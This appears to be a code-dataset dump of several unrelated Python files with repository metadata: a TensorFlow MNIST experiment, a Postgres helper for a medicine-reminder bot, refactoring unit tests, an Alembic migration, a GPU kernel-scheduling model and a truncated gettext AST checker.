| 25.937206 | 104 | 0.678308 | 15,961 | 0.966045 | 1,589 | 0.096175 | 1,526 | 0.092362 | 0 | 0 | 2,827 | 0.171105 |
d5ad529e55fa638ad8a24b07f5e82913bca91ecd | 3,327 | py | Python | src/deepnnmnist/deepnn-nobias/linear_deep_nn_nobias_no_activationf.py | renaudbougues/continuous-deep-q-learning | a96e1d9019a7291cc937de37404f2af71eaa2e32 | [
"MIT"
] | 1 | 2016-08-02T17:22:33.000Z | 2016-08-02T17:22:33.000Z | src/deepnnmnist/deepnn-nobias/linear_deep_nn_nobias_no_activationf.py | renaudbougues/continuous-deep-q-learning | a96e1d9019a7291cc937de37404f2af71eaa2e32 | [
"MIT"
] | 6 | 2016-10-02T00:18:52.000Z | 2016-10-02T00:22:59.000Z | src/deepnnmnist/deepnn-nobias/linear_deep_nn_nobias_no_activationf.py | renaudbougues/continuous-deep-q-learning | a96e1d9019a7291cc937de37404f2af71eaa2e32 | [
"MIT"
] | null | null | null | '''
Training a deep "incomplete" ANN on MNIST with Tensorflow
The ANN has no bias and no activation function
This function does not learn very well because the the hypothesis is completely off
The loss function is bad. The network is unstable in training (easily blow up) and
fails to learn the training dataset (<20% accuracy on training dataset)
'''
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# Parameters
n_epoch = 100
n_features = 784
n_examples = None
n_hidden_units_1 = 10
n_hidden_units_2 = 5
n_outputs = 10
learning_rate = .001
mini_batch_size = 50
# Fetch the mnist data
def fetch():
return input_data.read_data_sets('MNIST_data', one_hot = True)
# Define the model
# Model inputs & outputs definition
xx = tf.placeholder(tf.float32, shape=(n_examples, n_features), name = "MyInputs")
yy = tf.placeholder(tf.float32, shape=(n_examples, n_outputs), name = "MyLabels")
# Model hypothesis
ww_1 = tf.Variable(tf.truncated_normal(shape=(n_features, n_hidden_units_1), stddev = .05, dtype=tf.float32), name = "MyWeights_1", trainable=True)
ww_2 = tf.Variable(tf.truncated_normal(shape=(n_hidden_units_1, n_hidden_units_2), stddev = .05, dtype=tf.float32), name = "MyWeights_2", trainable=True)
ww_3 = tf.Variable(tf.truncated_normal(shape=(n_hidden_units_2, n_outputs), stddev = .05, dtype=tf.float32), name = "MyWeights_final", trainable=True)
aa_1 = tf.matmul(xx, ww_1)
#tf.nn.softmax(tf.matmul(xx, ww_1) + bb_1)
aa_2 = tf.matmul(aa_1, ww_2)
predict_yy = tf.matmul(aa_2, ww_3)
# Evaluate the loss
loss = tf.reduce_sum(tf.squared_difference(predict_yy, yy, "MyLoss"))
# Train the model / Apply gradient updates (One Step)
# Calculate gradient of the loss for each weight
# + Update each weight
opt = tf.train.GradientDescentOptimizer(learning_rate)
minimizer = opt.minimize(loss)
# Evaluate the model against the test data. Test the model
def eval(inputs):
return tf.matmul(inputs, ww)
# Init variables
init = tf.initialize_all_variables()
tf.scalar_summary("Loss", tf.reduce_mean(loss))
tf.scalar_summary("Weight1", tf.reduce_mean(ww_1))
tf.scalar_summary("Weight2", tf.reduce_mean(ww_2))
tf.scalar_summary("Weight3", tf.reduce_mean(ww_3))
merged = tf.merge_all_summaries()
def main():
print "Running %s" % __file__
mnist = fetch()
#tf.is_variable_initialized(ww)
with tf.Session() as sess:
# Create a summary writer, add the 'graph' to the event file.
writer = tf.train.SummaryWriter(".", sess.graph)
init.run()
for epoch in range(n_epoch):
batch = mnist.train.next_batch(mini_batch_size)
summaries, _, loss_val =sess.run([merged, minimizer, loss], feed_dict={xx: batch[0], yy: batch[1]})
print "run epoch {:d}: loss value is {:f}".format(epoch, loss_val)
#print summaries
writer.add_summary(summaries,epoch)
correct_prediction = tf.equal(tf.argmax(yy,1), tf.argmax(predict_yy,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
accuracy_val = accuracy.eval(feed_dict={xx: mnist.test.images, yy: mnist.test.labels})
print "\naccuracy is {:f}".format(accuracy_val*100)
# print eval(test_data)
if __name__ == '__main__': main()
| 34.298969 | 153 | 0.709047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,046 | 0.314397 |
d5ade4b8467958efc5bf0dd674d19bc8f2a64b86 | 416 | py | Python | tests/conftest.py | Usetech/labelgun | 0a3293cae3179b7d4e324154d0335d7d81a8455e | [
"MIT"
] | null | null | null | tests/conftest.py | Usetech/labelgun | 0a3293cae3179b7d4e324154d0335d7d81a8455e | [
"MIT"
] | null | null | null | tests/conftest.py | Usetech/labelgun | 0a3293cae3179b7d4e324154d0335d7d81a8455e | [
"MIT"
] | null | null | null | import pytest
import structlog
@pytest.fixture(autouse=True)
def setup():
structlog.configure(
processors=[
structlog.processors.JSONRenderer(ensure_ascii=False),
],
context_class=structlog.threadlocal.wrap_dict(dict),
logger_factory=structlog.stdlib.LoggerFactory(),
wrapper_class=structlog.stdlib.BoundLogger,
cache_logger_on_first_use=True,
)
| 26 | 66 | 0.699519 | 0 | 0 | 0 | 0 | 382 | 0.918269 | 0 | 0 | 0 | 0 |
d5aeb7169dd5488c77699e15ae16e978f40d715e | 3,271 | py | Python | lib/db_manager.py | kevin20888802/liang-medicine-line-bot-py | 07f63759e63272460f5ecfb0ce8fd6ed62b50e1c | [
"Apache-2.0"
] | null | null | null | lib/db_manager.py | kevin20888802/liang-medicine-line-bot-py | 07f63759e63272460f5ecfb0ce8fd6ed62b50e1c | [
"Apache-2.0"
] | null | null | null | lib/db_manager.py | kevin20888802/liang-medicine-line-bot-py | 07f63759e63272460f5ecfb0ce8fd6ed62b50e1c | [
"Apache-2.0"
] | null | null | null | import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
import os
import urllib.parse as urlparse
class PostgresBaseManager:
def __init__(self,local):
self.database = 'postgres'
self.user = 'postgres'
self.password = '1234'
self.host = 'localhost'
self.port = '5432'
self.localTest = local
self.conn = self.connect()
self.setupSQLCMD = """-- 使用者藥品表
--Drop Table If Exists UserMedicine;
Create Table If Not Exists UserMedicine
(
ID int GENERATED ALWAYS AS IDENTITY Primary Key,
UserID varchar(1024),
MedicineName varchar(1024),
Amount int,
TakeAmount int
);
-- 提醒時間表
--Drop Table If Exists Notify;
Create Table If Not Exists Notify
(
ID int GENERATED ALWAYS AS IDENTITY Primary Key,
UserID varchar(1024),
Description text,
TargetMedicine varchar(1024),
TargetTime varchar(128),
LastNotifyDate varchar(512),
TakeDate varchar(512)
);
-- 吃藥紀錄表
--Drop Table If Exists TakeMedicineHistory;
Create Table If Not Exists TakeMedicineHistory
(
ID int GENERATED ALWAYS AS IDENTITY Primary Key,
UserID varchar(1024),
Description text,
AnwTime varchar(128)
);
-- 使用者狀態表
--Drop Table If Exists UserStatus;
Create Table If Not Exists UserStatus
(
UserID varchar(1024) Primary Key,
Stat varchar(1024),
TempValue text
);
"""
pass
def connect(self):
"""
:return: 連接 Heroku Postgres SQL 認證用
"""
if self.localTest == True:
conn = psycopg2.connect(
database=self.database,
user=self.user,
password=self.password,
host=self.host,
port=self.port)
conn.autocommit = True
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
return conn
else:
DATABASE_URL = os.environ['DATABASE_URL']
conn = psycopg2.connect(DATABASE_URL, sslmode='require')
conn.autocommit = True
conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
return conn
pass
pass
def disconnect(self):
"""
:return: 關閉資料庫連線使用
"""
self.conn.close()
pass
def testConnection(self):
"""
:return: 測試是否可以連線到 Heroku Postgres SQL
"""
print("testing connection...")
cur = self.conn.cursor()
cur.execute('SELECT VERSION()')
results = cur.fetchall()
print("Database version : {0} ".format(results))
self.conn.commit()
cur.close()
pass
# 執行 sql 指令
def execute(self,cmd):
self.conn = self.connect()
cur = self.conn.cursor()
cur.execute(cmd)
self.conn.commit()
if cmd.startswith("Select") and (cur.rowcount > 0):
results = cur.fetchall()
cur.close()
return results
else:
return None
pass
pass
# 執行 sql 檔案
def executeFile(self,path):
self.conn = self.connect()
cur = self.conn.cursor()
sql_file = open(path,'r',encoding="utf-8")
print("running sql file:" + path)
cur.execute(sql_file.read())
self.conn.commit()
pass
pass | 25.356589 | 68 | 0.595537 | 3,254 | 0.963577 | 0 | 0 | 0 | 0 | 0 | 0 | 1,416 | 0.419307 |
d5af5a629e72cd72e0929e6e0460c5c839714274 | 6,763 | py | Python | bike/refactor/test_moveToModule.py | debiancn/bicyclerepair | dd054e802d6d8ad80baeccee0396da68144f2a26 | [
"ICU"
] | 2 | 2020-05-29T06:31:53.000Z | 2020-12-19T21:49:25.000Z | bike/refactor/test_moveToModule.py | debiancn/bicyclerepair | dd054e802d6d8ad80baeccee0396da68144f2a26 | [
"ICU"
] | null | null | null | bike/refactor/test_moveToModule.py | debiancn/bicyclerepair | dd054e802d6d8ad80baeccee0396da68144f2a26 | [
"ICU"
] | null | null | null | #!/usr/bin/env python
import setpath
from bike.testutils import *
from bike.transformer.save import save
from moveToModule import *
class TestMoveClass(BRMTestCase):
def test_movesTheText(self):
src1=trimLines("""
def before(): pass
class TheClass:
pass
def after(): pass
""")
src1after=trimLines("""
def before(): pass
def after(): pass
""")
src2after=trimLines("""
class TheClass:
pass
""")
try:
createPackageStructure(src1, "")
moveClassToNewModule(pkgstructureFile1,2,
pkgstructureFile2)
save()
self.assertEqual(src1after,file(pkgstructureFile1).read())
self.assertEqual(src2after,file(pkgstructureFile2).read())
finally:
removePackageStructure()
class TestMoveFunction(BRMTestCase):
def test_importsNameReference(self):
src1=trimLines("""
a = 'hello'
def theFunction(self):
print a
""")
src2after=trimLines("""
from a.foo import a
def theFunction(self):
print a
""")
self.helper(src1, src2after)
def test_importsExternalReference(self):
src0=("""
a = 'hello'
""")
src1=trimLines("""
from top import a
def theFunction(self):
print a
""")
src2after=trimLines("""
from top import a
def theFunction(self):
print a
""")
try:
createPackageStructure(src1, "", src0)
moveFunctionToNewModule(pkgstructureFile1,2,
pkgstructureFile2)
save()
self.assertEqual(src2after,file(pkgstructureFile2).read())
finally:
removePackageStructure()
def test_doesntImportRefCreatedInFunction(self):
src1=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
src2after=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
self.helper(src1, src2after)
def test_doesntImportRefCreatedInFunction(self):
src1=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
src2after=trimLines("""
def theFunction(self):
a = 'hello'
print a
""")
self.helper(src1, src2after)
def test_addsImportStatementToOriginalFileIfRequired(self):
src1=trimLines("""
def theFunction(self):
pass
b = theFunction()
""")
src1after=trimLines("""
from a.b.bah import theFunction
b = theFunction()
""")
try:
createPackageStructure(src1,"")
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile2)
save()
self.assertEqual(src1after,file(pkgstructureFile1).read())
finally:
removePackageStructure()
def test_updatesFromImportStatementsInOtherModules(self):
src0=trimLines("""
from a.foo import theFunction
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
""")
src0after=trimLines("""
from a.b.bah import theFunction
print theFunction()
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile2)
save()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def test_updatesFromImportMultiplesInOtherModules(self):
src0=trimLines("""
from a.foo import something,theFunction,somethingelse #comment
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
something = ''
somethingelse = 0
""")
src0after=trimLines("""
from a.foo import something,somethingelse #comment
from a.b.bah import theFunction
print theFunction()
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile2)
save()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def test_updatesFromImportMultiplesInTargetModule(self):
src0=trimLines("""
from a.foo import something,theFunction,somethingelse #comment
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
something = ''
somethingelse = 0
""")
src0after=trimLines("""
from a.foo import something,somethingelse #comment
print theFunction()
def theFunction(self):
pass
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile0)
save()
#print file(pkgstructureFile0).read()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def test_updatesFromImportInTargetModule(self):
src0=trimLines("""
from a.foo import theFunction
print theFunction()
""")
src1=trimLines("""
def theFunction(self):
pass
""")
src0after=trimLines("""
print theFunction()
def theFunction(self):
pass
""")
try:
createPackageStructure(src1,"",src0)
moveFunctionToNewModule(pkgstructureFile1,1,
pkgstructureFile0)
save()
self.assertEqual(src0after,file(pkgstructureFile0).read())
finally:
removePackageStructure()
def helper(self, src1, src2after):
try:
createPackageStructure(src1, "")
moveFunctionToNewModule(pkgstructureFile1,2,
pkgstructureFile2)
save()
self.assertEqual(src2after,file(pkgstructureFile2).read())
finally:
removePackageStructure()
if __name__ == "__main__":
unittest.main()
| 27.946281 | 70 | 0.530534 | 6,560 | 0.969984 | 0 | 0 | 0 | 0 | 0 | 0 | 2,452 | 0.362561 |
6334d71222020c31513865a447513d22aaed19c8 | 924 | py | Python | src/ggrc_risks/migrations/versions/20170823162755_5aa9ec7105d1_add_test_plan_field.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/ggrc_risks/migrations/versions/20170823162755_5aa9ec7105d1_add_test_plan_field.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 10 | 2018-07-06T00:04:23.000Z | 2021-02-26T21:13:20.000Z | src/ggrc_risks/migrations/versions/20170823162755_5aa9ec7105d1_add_test_plan_field.py | HLD/ggrc-core | 9bdc0fc6ca9e252f4919db682d80e360d5581eb4 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2017-11-11T22:16:56.000Z | 2017-11-11T22:16:56.000Z | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""
Add test_plan field
Create Date: 2017-08-23 16:27:55.094736
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
from ggrc.migrations.utils.resolve_duplicates import rename_ca_title
revision = '5aa9ec7105d1'
down_revision = '4e90a7e4907c'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
for table in ["risks", "threats"]:
op.add_column(
table,
sa.Column("test_plan", sa.Text, nullable=True),
)
rename_ca_title("Assessment Procedure", ["risk", "threat"])
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
for table in ["risks", "threats"]:
op.drop_column(table, "test_plan")
| 25.666667 | 79 | 0.717532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 546 | 0.590909 |
633670508ceec1cd4f56068d21ebd73c224ba536 | 16,818 | py | Python | mem_mem/avgblk.py | 3upperm2n/trans_kernel_model | 72a9156fa35b5b5407173f6dbde685feb0a6a3f5 | [
"MIT"
] | null | null | null | mem_mem/avgblk.py | 3upperm2n/trans_kernel_model | 72a9156fa35b5b5407173f6dbde685feb0a6a3f5 | [
"MIT"
] | null | null | null | mem_mem/avgblk.py | 3upperm2n/trans_kernel_model | 72a9156fa35b5b5407173f6dbde685feb0a6a3f5 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
from math import *
import copy # deep copy objects
from model_param import *
#------------------------------------------------------------------------------
# Figure out when to launch another block for current kernel
#------------------------------------------------------------------------------
def Search_block_start(df_sm_trace, current_kernel_id):
"""
Read the sm_trace table, find out all the active blocks on current sm,
look for the earliest start
"""
df_active = df_sm_trace.loc[df_sm_trace['active'] == 1]
if not df_active.empty:
blk2start = df_active['block_start'].max() # find the closest block
df_active_current_kernel = \
df_active.loc[df_active['kernel_id'] == current_kernel_id]
if not df_active_current_kernel.empty:
# find the closest blk for current kernel
blk2start = df_active_current_kernel['block_start'].max()
return blk2start
else:
# when, on current sm, all the blocks are done/de-activated
# warning!!!
return 0.0
#------------------------------------------------------------------------------
# Figure out which sm to start for current kernel
#------------------------------------------------------------------------------
def find_sm2start(sm_trace_list, kern_start):
sm_num = len(sm_trace_list)
AfterPrevKern = False
empSM = 0
# case 1) there are no trace on each sm
for df_sm in sm_trace_list:
if df_sm.empty:
empSM = empSM + 1 # do nothing
if empSM == sm_num:
return 0, AfterPrevKern
# case 2) there are traces: by the time where the kernel starts,
# all the blocks are done already, use sm 0
max_t = 0
for df_sm in sm_trace_list:
cur_max = df_sm.block_end.max()
if cur_max > max_t:
max_t = cur_max
if max_t <= kern_start:
AfterPrevKern = True
return 0, AfterPrevKern
else:
# case 3) : check currently active blocks
df_sm = sm_trace_list[0]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
min_t = df_activeblk.block_end.min()
target_sm = 0
for i in range(1,sm_num):
df_sm = sm_trace_list[i]
df_activeblk = df_sm.loc[df_sm['active'] == 1]
sm_blk_min = df_activeblk.block_end.min()
if sm_blk_min < min_t:
min_t = sm_blk_min
target_sm = i
return target_sm, AfterPrevKern
#------------------------------------------------------------------------------
# model cke function
#------------------------------------------------------------------------------
def cke_model(Gpu, sms_, sm_trace_, kernels_):
    """Model concurrent kernel execution (CKE) on the device.

    Schedules every kernel in *kernels_* block-by-block across the SMs,
    maintaining per-SM resource trackers and per-SM trace tables.

    :param Gpu: device descriptor; only ``Gpu.sm_num`` is read here.
    :param sms_: list of per-SM resource trackers (deep-copied, caller's
        objects are not mutated).
    :param sm_trace_: list of per-SM trace DataFrames (deep-copied).
    :param kernels_: list of kernel descriptors; each must expose
        ``gridDim``, ``start_ms`` and ``avg_blk_time``.
    :return: tuple ``(sms, sm_trace)`` with the updated resource trackers
        and trace tables.
    """
    # deep copy the input: we need to return the resource and trace for
    # each sm after modeling, without touching the caller's state
    sms = copy.deepcopy(sms_)
    sm_trace = copy.deepcopy(sm_trace_)
    kernels = copy.deepcopy(kernels_)

    kernel_num = len(kernels)
    sm_num = Gpu.sm_num

    # go through each kernel
    for i in range(kernel_num):
        kern = kernels[i]                  # schedule current kernel on the device
        kernel_blocks = int(kern.gridDim)  # total blocks for current kern

        kern_start = kern.start_ms

        # 1) find which sm to start from
        # 2) compute whether kernel_start happens before previous kernel ends or not
        sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)

        #---------------------------------------------------------
        # Run after previous kernel
        #---------------------------------------------------------
        if AfterPrevKern:
            # deactivate all the previously active blocks
            for myid, df_sm in enumerate(sm_trace):
                df_activeblk = df_sm.loc[df_sm['active'] == 1]
                # find the row index of active blocks
                for index, row in df_activeblk.iterrows():
                    # fix: label-based assignment.  The former chained form
                    # `.loc[index]['active'] = 0` wrote to a temporary Series
                    # copy and never cleared the flag in the trace table.
                    sm_trace[myid].loc[index, 'active'] = 0  # deactivate
                    # NOTE(review): frees the *current* kernel's footprint,
                    # not that of the kernel owning the retired block --
                    # confirm this is intended
                    sms[myid].Rm(kern)  # free the block resource

        #---------------------------------------------------------
        # Continue current kernel
        #---------------------------------------------------------
        for bid in range(kernel_blocks):
            sm_id = (bid + sm2start) % sm_num
            to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
            #----------------------------------
            # there is enough resource to host the current block
            #----------------------------------
            if to_allocate_another_block:
                # deduct resources on the current sm
                sms[sm_id].Allocate_block(kern)

                #---------------------------------------
                # register the block in the trace table
                #---------------------------------------
                block_start = None
                offset = 0.0
                # Note: only the 1st wave of blocks adjusts by kern_start
                if AfterPrevKern and bid < sm_num:
                    offset = kern_start

                # if current sm trace table is empty, start from kernel_start
                # else find the blocks that will end soon, and retire them
                if sm_trace[sm_id].empty:
                    block_start = kern_start
                else:
                    # read the sm_trace table, find out all the active blocks
                    # on current sm, look for the earliest start
                    block_start = Search_block_start(sm_trace[sm_id], i) + offset

                block_end = block_start + kern.avg_blk_time

                # add the current block info to the current sm
                # NOTE(review): DataFrame.append is deprecated/removed in
                # pandas >= 2.0; keep only while pinned to an older pandas
                sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
                                                          'block_id': bid,
                                                          'block_start': block_start,
                                                          'block_end': block_end,
                                                          'batch_id': sms[sm_id].batch,
                                                          'kernel_id': i,
                                                          'active': 1}, ignore_index=True)
            #-------------------------------------------
            # There is no more resources to host the blk, consider SM is full now
            # we need to (1) decide how many blks to retire
            #            (2) when to start current blk
            else:
                # find out the active blocks on current sm
                df_sm = sm_trace[sm_id]
                df_activeblk = df_sm.loc[df_sm['active'] == 1]
                df_loc = df_activeblk.copy(deep=True)

                cur_activeblk_num = df_activeblk.shape[0]

                for ii in range(cur_activeblk_num):
                    # find out blocks ending soon
                    blkend_min = df_loc['block_end'].min()
                    df_blk2end = df_loc.loc[df_loc['block_end'] == blkend_min]

                    # retire the blocks
                    for index, row in df_blk2end.iterrows():
                        # fix: label-based assignment (see note above)
                        sm_trace[sm_id].loc[index, 'active'] = 0
                        sms[sm_id].Rm(kern)  # free the block resource

                    # enough to allocate a current block
                    if check_sm_resource(sms[sm_id], kern):
                        sms[sm_id].Allocate_block(kern)
                        # when prev blks end, current block starts
                        block_start = blkend_min
                        # add avg blk time for current kernel
                        block_end = block_start + kern.avg_blk_time
                        break  # jump out of the loop
                    else:
                        # not enough to allocate another block yet.
                        # NOTE(review): df_loc is not refreshed here, so the
                        # next iteration re-selects the same minimum rows --
                        # confirm against run_gpu_kernel, which re-reads the
                        # active set at this point
                        pass

                # update the trace table
                sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
                                                          'block_id': bid,
                                                          'block_start': block_start,
                                                          'block_end': block_end,
                                                          'batch_id': sms[sm_id].batch,
                                                          'kernel_id': i,
                                                          'active': 1}, ignore_index=True)

        # end of running blocks for current kernel
    # end of kernel iteration

    # return the updated sm resource and trace table
    return sms, sm_trace
#------------------------------------------------------------------------------
# Find kern time on current sm
#------------------------------------------------------------------------------
def find_kernel_time(df_sm_trace, kern_id):
    """Return ``(start, end)`` of kernel *kern_id* on one SM trace.

    Start is the earliest block_start, end the latest block_end among
    the kernel's blocks recorded in *df_sm_trace*.
    """
    kernel_mask = df_sm_trace.kernel_id == kern_id
    starts = df_sm_trace.loc[kernel_mask, 'block_start']
    ends = df_sm_trace.loc[kernel_mask, 'block_end']
    return starts.min(), ends.max()
#------------------------------------------------------------------------------
# Find out kernel runtime by reading the traces from each SM
#------------------------------------------------------------------------------
def Get_KernTime(sm_trace):
    """Compute each kernel's ``[start, end]`` window from the per-SM traces.

    For every kernel id seen on any SM, the start is the earliest
    block_start and the end is the latest block_end across all SMs.

    The original implementation ran its "empty dict" and "non-empty dict"
    branches both on the first SM and called find_kernel_time twice per
    kernel; this version does a single merge pass with identical results.

    :param sm_trace: list of per-SM trace DataFrames.
    :return: dict mapping kernel_id -> [start, end].
    """
    def _kernel_span(df_sm, kern_id):
        # earliest block start / latest block end of this kernel on one sm
        df_kern = df_sm.loc[df_sm.kernel_id == kern_id]
        return df_kern.block_start.min(), df_kern.block_end.max()

    kern_dd = {}
    for df_sm in sm_trace:
        # find out all the kernels on current sm
        for kern_id in df_sm.kernel_id.unique():
            start_t, end_t = _kernel_span(df_sm, kern_id)
            if kern_id in kern_dd:
                # widen the recorded window if this sm extends it
                prev_start, prev_end = kern_dd[kern_id]
                kern_dd[kern_id] = [min(prev_start, start_t),
                                    max(prev_end, end_t)]
            else:
                kern_dd[kern_id] = [start_t, end_t]  # add to dd
    return kern_dd
#------------------------------------------------------------------------------
# run a single gpu kernel one at a time
#------------------------------------------------------------------------------
def run_gpu_kernel(Gpu, sms_, sm_trace_, kern, kern_id):
    """Schedule a single kernel on the device, one block at a time.

    :param Gpu: device descriptor; only ``Gpu.sm_num`` is read here.
    :param sms_: list of per-SM resource trackers (deep-copied).
    :param sm_trace_: list of per-SM trace DataFrames (deep-copied).
    :param kern: kernel descriptor exposing ``gridDim``, ``start_ms`` and
        ``avg_blk_time``.
    :param kern_id: id used to tag this kernel's rows in the trace tables.
    :return: tuple ``(sms, sm_trace)`` with the updated resource trackers
        and trace tables.
    """
    sms = copy.deepcopy(sms_)
    sm_trace = copy.deepcopy(sm_trace_)

    sm_num = Gpu.sm_num
    kernel_blocks = int(kern.gridDim)  # total blocks for current kern

    kern_start = kern.start_ms

    # 1) find which sm to start from
    # 2) compute whether kernel_start happens before previous kernel ends or not
    sm2start, AfterPrevKern = find_sm2start(sm_trace, kern_start)

    #---------------------------------------------------------
    # Run after previous kernel
    #---------------------------------------------------------
    if AfterPrevKern:
        # deactivate all the previously active blocks
        for df_sm in sm_trace:
            df_activeblk = df_sm.loc[df_sm['active'] == 1]
            if not df_activeblk.empty:
                myid = int(df_activeblk.iloc[0]['sm_id'])
                for index, row in df_activeblk.iterrows():  # find the row index of active blocks
                    # fix: label-based assignment.  The former chained form
                    # `.loc[index]['active'] = 0` wrote to a temporary Series
                    # copy and never cleared the flag in the trace table.
                    sm_trace[myid].loc[index, 'active'] = 0  # deactivate
                    # NOTE(review): frees the *current* kernel's footprint,
                    # not that of the kernel owning the retired block --
                    # confirm this is intended
                    sms[myid].Rm(kern)  # free the block resource

    #---------------------------------------------------------
    # Continue current kernel
    #---------------------------------------------------------
    for bid in range(kernel_blocks):
        sm_id = (bid + sm2start) % sm_num
        to_allocate_another_block = check_sm_resource(sms[sm_id], kern)
        #----------------------------------
        # there is enough resource to host the current block
        #----------------------------------
        if to_allocate_another_block:
            sms[sm_id].Allocate_block(kern)  # deduct resources on the current sm
            #---------------------------------------
            # register the block in the trace table
            #---------------------------------------
            block_start = None
            offset = 0.0
            if AfterPrevKern and bid < sm_num:  # only the 1st wave of blocks adjusts by kern_start
                offset = kern_start

            # if current sm trace table is empty, start from kern_start
            # else find the blocks that will end soon, and retire them
            if sm_trace[sm_id].empty:
                block_start = kern_start
            else:
                # read the sm_trace table, find out all the active blocks on
                # current sm, look for the earliest start
                block_start = Search_block_start(sm_trace[sm_id], kern_id) + offset

            block_end = block_start + kern.avg_blk_time

            # add the current block info to the current sm
            # NOTE(review): DataFrame.append is deprecated/removed in
            # pandas >= 2.0; keep only while pinned to an older pandas
            sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
                                                      'block_id': bid,
                                                      'block_start': block_start,
                                                      'block_end': block_end,
                                                      'batch_id': sms[sm_id].batch,
                                                      'kernel_id': kern_id,
                                                      'active': 1}, ignore_index=True)
        #-------------------------------------------
        # There is no more resources to host the blk, consider SM is full now
        # we need to (1) decide how many blks to retire (2) when to start current blk
        else:
            # find out the active blocks on current sm
            df_sm = sm_trace[sm_id]
            df_activeblk = df_sm.loc[df_sm['active'] == 1]
            df_loc = df_activeblk.copy(deep=True)

            cur_activeblk_num = df_activeblk.shape[0]

            for ii in range(cur_activeblk_num):
                # find out blocks ending soon
                blkend_min = df_loc['block_end'].min()
                df_blk2end = df_loc.loc[df_loc['block_end'] == blkend_min]

                # retire the blocks
                for index, row in df_blk2end.iterrows():
                    # fix: label-based assignment (see note above)
                    sm_trace[sm_id].loc[index, 'active'] = 0
                    sms[sm_id].Rm(kern)  # free the block resource

                # enough to allocate a current block
                if check_sm_resource(sms[sm_id], kern):
                    sms[sm_id].Allocate_block(kern)
                    block_start = blkend_min  # when prev blks end, current block starts
                    block_end = block_start + kern.avg_blk_time
                    break  # jump out of the loop
                else:
                    # not enough to allocate another block yet: re-read the
                    # still-active set so the next iteration retires the
                    # next-earliest blocks
                    df_loc = df_sm.loc[df_sm['active'] == 1]

            # update the trace table
            sm_trace[sm_id] = sm_trace[sm_id].append({'sm_id': sm_id,
                                                      'block_id': bid,
                                                      'block_start': block_start,
                                                      'block_end': block_end,
                                                      'batch_id': sms[sm_id].batch,
                                                      'kernel_id': kern_id,
                                                      'active': 1}, ignore_index=True)

    # return the updated sm resource and trace table
    return sms, sm_trace
| 43.012788 | 116 | 0.466821 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,210 | 0.369247 |
6336e1b7ec75cc9e6881dda4dff8c780539d97ab | 4,322 | py | Python | pychecktext/checktext_parser.py | da1910/pyCheckText | a00738aff3fa20c520343b3d12fa8c87a90e1c65 | [
"MIT"
] | null | null | null | pychecktext/checktext_parser.py | da1910/pyCheckText | a00738aff3fa20c520343b3d12fa8c87a90e1c65 | [
"MIT"
] | null | null | null | pychecktext/checktext_parser.py | da1910/pyCheckText | a00738aff3fa20c520343b3d12fa8c87a90e1c65 | [
"MIT"
] | 1 | 2020-06-05T14:56:10.000Z | 2020-06-05T14:56:10.000Z | import _ast
import ast
from typing import Dict, Union
import os
from pychecktext import teamcity, teamcity_messages
class CheckTextVisitor(ast.NodeVisitor):
def __init__(self, aliases: Dict[str, str] = {}):
self.literal_calls = []
self.expression_calls = []
self.aliases = aliases
self.function_signatures = {
"dgettext": [0, 1],
"dngettext": [0, 1, 2],
"dnpgettext": [0, 1, 2, 3],
"dpgettext": [0, 1, 2],
"gettext": [0],
"ldgettext": [0, 1],
"ldngettext": [0, 1, 2],
"lgettext": [0],
"lngettext": [0, 1],
"ngettext": [0, 1],
"npgettext": [0, 1, 2],
"pgettext": [0, 1]}
for alias, source in aliases.items():
self.function_signatures[alias] = self.function_signatures[source]
def visit_Call(self, node: _ast.Call):
func_object = node.func
if hasattr(node, 'args'):
for arg in node.args:
if isinstance(arg, _ast.Call):
self.visit_Call(arg)
if hasattr(func_object, 'id') and func_object.id in self.function_signatures:
# Get the calling function name, resolve aliases here
if func_object.id in self.aliases:
calling_name = self.aliases[func_object.id]
else:
calling_name = func_object.id
# A call to gettext or one of its aliases, check if we have a literal
called_args = []
message_args = [node.args[index] for index in self.function_signatures[func_object.id]]
if not isinstance(message_args, list):
message_args = [message_args]
has_complex_arg = False
for arg in message_args:
